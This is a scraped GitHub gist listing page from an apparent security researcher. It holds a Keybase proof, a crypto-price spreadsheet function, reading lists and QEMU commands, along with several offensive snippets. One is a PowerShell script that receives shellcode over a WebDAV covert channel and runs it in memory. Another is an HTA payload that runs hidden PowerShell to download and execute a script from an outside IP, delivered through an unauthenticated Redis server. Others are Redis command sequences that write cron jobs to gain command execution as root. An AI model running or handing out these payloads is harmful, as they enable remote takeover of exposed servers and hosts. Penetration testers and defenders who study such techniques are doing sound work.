I hereby claim:
- I am carnal0wnage on github.
- I am carnal0wnage (https://keybase.io/carnal0wnage) on keybase.
- I have a public key ASBAbr1taoZoDoZ5mQsko2BW675dxHpNRP-cenmfGfO03Qo
To claim this, I am signing this object:
Chris Gates carnal0wnage
carnal0wnage
/ gist:cd5d5c714fd69691d80650887c3d5d75
Last active
September 12, 2023 12:31
Google Sheet Code to grab current price from coin market cap
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //from: https://github.com/rathergood/Crypto-Currency-Price/blob/master/ccprice | |
| //returns price (or other info) of cryptocurrency from coinmarketcap api. | |
| //takes two parameters, the name of the cryptocurrency and info that you want returned about the cc | |
| //example: =ccprice("ethereum", "USD") | |
| //example2 =ccprice("ethereum", "24h_volume_usd") | |
| function ccprice(name, currency) | |
| { |
carnal0wnage
/ keybase.md
Created
October 1, 2017 17:55
carnal0wnage
/ Invoke-WebDavDelivery.ps1
Created
September 8, 2017 02:25
Payload delivery using WebDAV PROPFIND only covert channel
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-WebDavDelivery | |
| { | |
| <# | |
| .SYNOPSIS | |
| Receive a shellcode over WebDav PROPFIND channel, then load it into memory and execute it. | |
| This script requires its server side counterpart (webdavdelivery.py) to communicate with and actually deliver the payload data. | |
| Function: Invoke-WebDavDelivery | |
| Author: Arno0x0x, Twitter: @Arno0x0x |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| From: http://redteams.net/bookshelf/ | |
| Techie | |
| Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp. | |
| Social Engineering: The Art of Human Hacking by Christopher Hadnagy | |
| Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam | |
| The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick | |
| Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others. | |
| Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor | |
| The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors |
carnal0wnage
/ windows10qemu.sh
Created
April 3, 2017 19:18
— forked from Manouchehri/windows10qemu.sh
Running Windows 10 in a UEFI enabled QEMU environment with KVM.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Installing | |
| qemu-system-x86_64 -bios /usr/share/ovmf/ovmf_x64.bin -enable-kvm -cpu host -smp 4 -m 2048 -cdrom ~/Downloads/Win10_English_x64.iso -net nic,model=virtio -net user -drive file=~/vm/win10.hd.img.raw,format=raw,if=virtio -vga qxl -drive file=~/Downloads/virtio-win-0.1.105.iso,index=1,media=cdrom | |
| # Running | |
| qemu-system-x86_64 -bios /usr/share/ovmf/ovmf_x64.bin -enable-kvm -cpu host -smp 4 -m 4096 -net nic,model=virtio -net user -drive file=~/vm/win10.hd.img.raw,format=raw,if=virtio -vga qxl -usbdevice tablet -rtc base=utc |
carnal0wnage
/ DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
Last active
September 26, 2022 06:00
Links from Chris Gates/Ken Johnson DevOOPS RSA 17 presentation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RSA 2017 DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links SessionID: HTA-W02 | |
| https://www.slideshare.net/chrisgates/devoops-attacks-and-defenses-for-devops-toolchains | |
| Recording of talk from CERN | |
| https://indico.cern.ch/event/622483/ (click the recording button) | |
| Past talks: | |
| http://www.slideshare.net/KenJohnson61/aws-surival-guide |
carnal0wnage
/ gist:93a9a8fa20acd0d62d0343b438710db8
Created
January 18, 2017 02:06
redis windows shell via hta file
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [email protected]:~# cat hta-psh.txt | |
| <scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt> | |
| # cat hta-psh.txt |redis-cli -x -h 192.168.138.27 set a | |
| OK | |
| #msfconsole | |
| use payload/windows/meterpreter/reverse_tcp | |
| generate -t hta-psh -f /var/www/1.ps1 | |
| #cat 1.ps1 |
carnal0wnage
/ gist:b5e8ae7a489207c58f54cfaa7b37718d
Last active
January 18, 2017 02:06
redis crontab exec from temp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo " " > /tmp/zz | |
| cat /tmp/w >> /tmp/zz | |
| /bin/sh /tmp/zz | |
| redis-cli get r | |
| * * * * * sleep 10;/bin/sh /tmp/zz | |
carnal0wnage
/ gist:5a9578a66484435b9685e03a27c9d3fc
Last active
January 18, 2017 02:07
redis crontab whoami
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| redis-cli flushall | |
| redis-cli set 2 ';a=`redis-cli get c`;' | |
| redis-cli set 1 'id;redis-cli set r `$a`;#' | |
| redis-cli config set dir /tmp/ | |
| redis-cli config set dbfilename w | |
| redis-cli save | |
| redis-cli set c whoami | |
| from https://phpinfo.me/2016/07/07/1275.html |
carnal0wnage
/ gist:01963c7a36235e90c11ef8756e76d3d5
Last active
January 18, 2017 02:08
redis crontab /tmp/888
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| redis-cli flushall # 为了方便测试 | |
| redis-cli set test 'test' | |
| redis-cli set my 'mymymymymymymymymymymymy' | |
| redis-cli set word 'wordwordwordwordwordword' | |
| redis-cli set hello 'ringzero' | |
| redis-cli set word1 'word1word1word1word1word1word1' | |
| echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1 | |
| redis-cli config set dir /var/spool/cron/ | |
| redis-cli config set dbfilename root | |
| redis-cli save |